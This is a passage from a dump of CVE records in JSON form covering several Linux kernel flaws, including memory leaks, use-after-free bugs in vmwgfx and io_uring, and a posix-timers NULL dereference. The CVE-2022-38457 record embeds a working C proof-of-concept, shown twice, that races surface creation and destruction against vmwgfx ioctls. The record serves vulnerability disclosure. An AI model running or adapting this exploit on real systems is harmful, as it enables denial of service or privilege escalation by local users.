            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-17T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=0dc9254e03704c75f2ebc9cbef2ce4de83fba603"
        },
        {
          "url": "https://vuldb.com/?id.211031"
        }
      ],
      "title": "Linux Kernel BPF usdt.c parse_usdt_arg memory leak",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3533",
    "datePublished": "2022-10-17T00:00:00",
    "dateReserved": "2022-10-17T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.207Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-38457
Vulnerability from cvelistv5
Published
2022-09-06 00:00
Modified
2024-08-03 10:54
Severity
Summary
There is an UAF vulnerability in vmwgfx driver
References
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:54:03.666Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.20-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int handle,int sid){   \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1;  \n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"poc failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"alloc_bo failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"create_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\n\nvoid destory_surface(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x4008644A, \u0026arg) == -1)\n                {\n                        printf(\"destory_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }       \n}\nvoid thread1(){\nwhile(1){\nsid = create_surface(); \ndestory_surface(sid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(handle,sid);  \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n    \n\ninit();\nhandle=alloc_bo();\n        if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n                perror(\"thread_create\");\n        }\n\n\t\n              if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n                perror(\"thread_create\");\n        }\n        \n        while(1){\n        sleep(3);\n        \n        }\n}\n  \n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-09-09T14:39:51",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is an UAF vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "AKA": "Anolis",
          "ASSIGNER": "security@openanolis.org",
          "DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
          "ID": "CVE-2022-38457",
          "STATE": "PUBLIC",
          "TITLE": "There is an UAF vulnerability in vmwgfx driver"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003e=",
                            "version_name": "5.13.0-52",
                            "version_value": "v4.20-rc1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int handle,int sid){   \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1;  \n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"poc failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"alloc_bo failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"create_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\n\nvoid destory_surface(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x4008644A, \u0026arg) == -1)\n                {\n                        printf(\"destory_surface failed: %s\\n\", strerror(errno));\n                        return -1;\n                }       \n}\nvoid thread1(){\nwhile(1){\nsid = create_surface(); \ndestory_surface(sid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(handle,sid);  \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n    \n\ninit();\nhandle=alloc_bo();\n        if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n                perror(\"thread_create\");\n        }\n\n\t\n              if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n                perror(\"thread_create\");\n        }\n        \n        while(1){\n        sleep(3);\n        \n        }\n}\n  \n"
          }
        ],
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-416 Use After Free"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074",
              "refsource": "MISC",
              "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
            }
          ]
        },
        "source": {
          "defect": [
            "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-38457",
    "datePublished": "2022-09-06T00:00:00",
    "dateReserved": "2022-09-07T00:00:00",
    "dateUpdated": "2024-08-03T10:54:03.666Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-2767
Vulnerability from cvelistv5
Published
2009-08-14 15:00
Modified
2024-08-07 05:59
Severity
Summary
The init_posix_timers function in kernel/posix-timers.c in the Linux kernel before 2.6.31-rc6 allows local users to cause a denial of service (OOPS) or possibly gain privileges via a CLOCK_MONOTONIC_RAW clock_nanosleep call that triggers a NULL pointer dereference.
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T05:59:57.153Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "36200",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/36200"
          },
          {
            "name": "[linux-kernel] 20090804 Re: [PATCH] posix-timers: fix oops in clock_nanosleep() with CLOCK_MONOTONIC_RAW",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://lkml.org/lkml/2009/8/4/40"
          },
          {
            "name": "ADV-2009-2197",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/2197"
          },
          {
            "name": "USN-852-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-852-1"
          },
          {
            "name": "[oss-security] 20090806 CVE request: kernel: clock_nanosleep() with CLOCK_MONOTONIC_RAW NULL pointer dereference",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2009/08/06/2"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=70d715fd0597f18528f389b5ac59102263067744"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.31-rc6"
          },
          {
            "name": "linux-kernel-clocknanosleep-priv-escalation(52317)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52317"
          },
          {
            "name": "[linux-kernel] 20090804 Re: [PATCH] posix-timers: fix oops in clock_nanosleep() with CLOCK_MONOTONIC_RAW",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://lkml.org/lkml/2009/8/4/28"
          },
          {
            "name": "37105",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37105"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-08-13T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The init_posix_timers function in kernel/posix-timers.c in the Linux kernel before 2.6.31-rc6 allows local users to cause a denial of service (OOPS) or possibly gain privileges via a CLOCK_MONOTONIC_RAW clock_nanosleep call that triggers a NULL pointer dereference."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-08-16T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "36200",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/36200"
        },
        {
          "name": "[linux-kernel] 20090804 Re: [PATCH] posix-timers: fix oops in clock_nanosleep() with CLOCK_MONOTONIC_RAW",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://lkml.org/lkml/2009/8/4/40"
        },
        {
          "name": "ADV-2009-2197",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/2197"
        },
        {
          "name": "USN-852-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-852-1"
        },
        {
          "name": "[oss-security] 20090806 CVE request: kernel: clock_nanosleep() with CLOCK_MONOTONIC_RAW NULL pointer dereference",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2009/08/06/2"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=70d715fd0597f18528f389b5ac59102263067744"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.31-rc6"
        },
        {
          "name": "linux-kernel-clocknanosleep-priv-escalation(52317)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52317"
        },
        {
          "name": "[linux-kernel] 20090804 Re: [PATCH] posix-timers: fix oops in clock_nanosleep() with CLOCK_MONOTONIC_RAW",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://lkml.org/lkml/2009/8/4/28"
        },
        {
          "name": "37105",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37105"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2009-2767",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The init_posix_timers function in kernel/posix-timers.c in the Linux kernel before 2.6.31-rc6 allows local users to cause a denial of service (OOPS) or possibly gain privileges via a CLOCK_MONOTONIC_RAW clock_nanosleep call that triggers a NULL pointer dereference."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "36200",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36200"
            },
            {
              "name": "[linux-kernel] 20090804 Re: [PATCH] posix-timers: fix oops in clock_nanosleep() with CLOCK_MONOTONIC_RAW",
              "refsource": "MLIST",
              "url": "http://lkml.org/lkml/2009/8/4/40"
            },
            {
              "name": "ADV-2009-2197",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2009/2197"
            },
            {
              "name": "USN-852-1",
              "refsource": "UBUNTU",
              "url": "http://www.ubuntu.com/usn/USN-852-1"
            },
            {
              "name": "[oss-security] 20090806 CVE request: kernel: clock_nanosleep() with CLOCK_MONOTONIC_RAW NULL pointer dereference",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2009/08/06/2"
            },
            {
              "name": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=70d715fd0597f18528f389b5ac59102263067744",
              "refsource": "CONFIRM",
              "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=70d715fd0597f18528f389b5ac59102263067744"
            },
            {
              "name": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.31-rc6",
              "refsource": "CONFIRM",
              "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.31-rc6"
            },
            {
              "name": "linux-kernel-clocknanosleep-priv-escalation(52317)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/52317"
            },
            {
              "name": "[linux-kernel] 20090804 Re: [PATCH] posix-timers: fix oops in clock_nanosleep() with CLOCK_MONOTONIC_RAW",
              "refsource": "MLIST",
              "url": "http://lkml.org/lkml/2009/8/4/28"
            },
            {
              "name": "37105",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/37105"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2009-2767",
    "datePublished": "2009-08-14T15:00:00",
    "dateReserved": "2009-08-14T00:00:00",
    "dateUpdated": "2024-08-07T05:59:57.153Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3176
Vulnerability from cvelistv5
Published
2022-09-16 00:00
Modified
2024-08-03 01:00
Severity
Summary
Use-after-free in io_uring in Linux Kernel
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:00:10.627Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/#fc78b2fc21f10c4c9c4d5d659a685710ffa63659"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit?h=linux-5.4.y\u0026id=fc78b2fc21f10c4c9c4d5d659a685710ffa63659"
          },
          {
            "name": "DSA-5257",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2022/dsa-5257"
          },
          {
            "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20230216-0003/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "fc78b2fc21f10c4c9c4d5d659a685710ffa63659",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Bing-Jhong Billy Jheng \u003cbilly@starlabs.sg\u003e"
        }
      ],
      "datePublic": "2022-08-31T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "There exists a use-after-free in io_uring in the Linux kernel. Signalfd_poll() and binder_poll() use a waitqueue whose lifetime is the current task. It will send a POLLFREE notification to all waiters before the queue is freed. Unfortunately, the io_uring poll doesn\u0027t handle POLLFREE. This allows a use-after-free to occur if a signalfd or binder fd is polled with io_uring poll, and the waitqueue gets freed. We recommend upgrading past commit fc78b2fc21f10c4c9c4d5d659a685710ffa63659"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-02-16T00:00:00",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "url": "https://kernel.dance/#fc78b2fc21f10c4c9c4d5d659a685710ffa63659"
        },
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit?h=linux-5.4.y\u0026id=fc78b2fc21f10c4c9c4d5d659a685710ffa63659"
        },
        {
          "name": "DSA-5257",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2022/dsa-5257"
        },
        {
          "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230216-0003/"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in io_uring in Linux Kernel",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2022-3176",
    "datePublished": "2022-09-16T00:00:00",
    "dateReserved": "2022-09-12T00:00:00",
    "dateUpdated": "2024-08-03T01:00:10.627Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-0742
Vulnerability from cvelistv5
Published
2022-03-18 11:20
Modified
2024-08-02 23:40
Severity
9.1 (Critical) - cvssV3_1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
Summary
Memory leak in ICMP6 in Linux Kernel
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:40:03.643Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.openwall.com/lists/oss-security/2022/03/15/3"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2d3916f3189172d5c69d33065c3c21119fe539fc"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20220425-0001/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThanOrEqual": "5.13",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
